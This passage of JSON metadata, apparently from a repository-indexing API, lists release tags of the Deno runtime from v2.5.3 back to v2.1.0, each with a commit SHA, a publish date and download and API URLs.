om/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_p